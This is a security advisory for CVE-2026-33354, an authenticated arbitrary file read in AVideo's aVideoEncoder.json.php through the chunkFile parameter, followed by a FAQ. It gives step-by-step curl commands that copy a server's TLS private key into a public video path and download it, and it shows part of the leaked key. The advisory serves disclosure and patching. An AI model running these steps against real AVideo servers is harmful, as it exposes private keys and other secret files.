CVE-2026-33354: AVideo has an authenticated arbitrary local file read via `chunkFile` path injection in `aVideoEncoder.json.php`
Summary POST /objects/aVideoEncoder.json.php accepts a requester-controlled chunkFile parameter intended for staged upload chunks. Instead of restricting that path to trusted server-generated chunk locations, the endpoint accepts arbitrary local filesystem paths that pass isValidURLOrPath(). That helper allows files under broad server directories including /var/www/, the application root, cache, tmp, and videos, only rejecting .php files.
For an authenticated uploader editing their own video, this becomes an arbitrary local file read. The endpoint copies the attacker-chosen local file into the attacker's public video storage path, after which it can be downloaded over HTTP.
I confirmed this locally by creating an attacker-owned video, then calling aVideoEncoder.json.php with videosid=<own video>, format=mp4, and chunkFile=/var/www/html/AVideo/.compose/letsencrypt/live/localhost/privkey.pem. The resulting public video URL returned the local TLS private key and began with -----BEGIN PRIVATE KEY-----.
Affected Versions / Commit Tested on local Docker deployment from commit db12d4c0141d40bfabd1e82577e8c4a3d044cd84. The application reported version 26.0.
Preconditions - Authenticated account with upload permission. - Attacker owns at least one editable video record. - Target local file is readable by the web application user.
Steps to Reproduce 1. Log in as an upload-capable low-privileged user. 2. Create any attacker-owned video via the normal upload endpoint to obtain videosid and filename. 3. Send a POST request to aVideoEncoder.json.php with the attacker's own videosid, an allowed format, and a server-local chunkFile path. 4. Download the resulting media object from /videos/<filename>/<filename>.mp4.
Proof of Concept The included poc.py automates the exploit against the local instance.
Manual reproduction:
bash 1. Login as low-priv uploader curl -s -c attacker.cookies \ -d 'user=attacker&pass=UserPass123!' \ http://127.0.0.1/objects/login.json.php >/dev/null
2. Create an attacker-owned video printf 'x' > poc.mp4 curl -s -b attacker.cookies \ -F 'upl=@poc.mp4;type=video/mp4' \ http://127.0.0.1/view/mini-upload-form/upload.php
Example response: {"error":false,"title":"poc","filename":"poc69bb86db62c308.68438735","videosid":4,...}
3. Copy a local file into the attacker's public video path curl -s -b attacker.cookies \ -d 'videosid=4&format=mp4&title=poc&description=test&chunkFile=/var/www/html/AVideo/.compose/letsencrypt/live/localhost/privkey.pem' \ http://127.0.0.1/objects/aVideoEncoder.json.php
4. Retrieve the copied file over HTTP curl -s \ http://127.0.0.1/videos/poc69bb86db62c308.68438735/poc69bb86db62c308.68438735.mp4 | head
Observed Result The final GET returned the contents of the local TLS private key:
text -----BEGIN PRIVATE KEY----- MIIJQgIBADANBgkqhkiG9w0BAQEFAASCCSwwggkoAgEAAoICAQ...
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WWBN AVideo is an open source video platform. In versions up to and including 26.0, POST /objects/aVideoEncoder.json.php accepts a requester-controlled chunkFile parameter intended for staged upload chunks. Instead of restricting that path to trusted server-generated chunk locations, the endpoint accepts arbitrary local filesystem paths that pass isValidURLOrPath(). That helper allows files under broad server directories including /var/www/, the application root, cache, tmp, and videos, only rejecting .php files. For an authenticated uploader editing their own video, this becomes an arbitrary local file read. The endpoint copies the attacker-chosen local file into the attacker's public video storage path, after which it can be downloaded over HTTP. Commit 59bbd601a3f65a5b18c1d9e4eb11471c0a59214f contains a patch for the issue.
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Frequently Asked Questions
What is the severity of CVE-2026-33354?
CVE-2026-33354 is considered to have a high severity due to its potential for arbitrary file system access.
How do I fix CVE-2026-33354?
To fix CVE-2026-33354, ensure that the 'chunkFile' parameter is validated to restrict uploads to safe, predetermined file paths.
What software is affected by CVE-2026-33354?
CVE-2026-33354 affects the wwbn/avideo package up to version 26.0.
What type of vulnerability is CVE-2026-33354?
CVE-2026-33354 is a directory traversal vulnerability that allows access to arbitrary local filesystem paths.
Can CVE-2026-33354 be exploited remotely?
Yes, CVE-2026-33354 can be exploited remotely since it involves a web endpoint that accepts controlled input.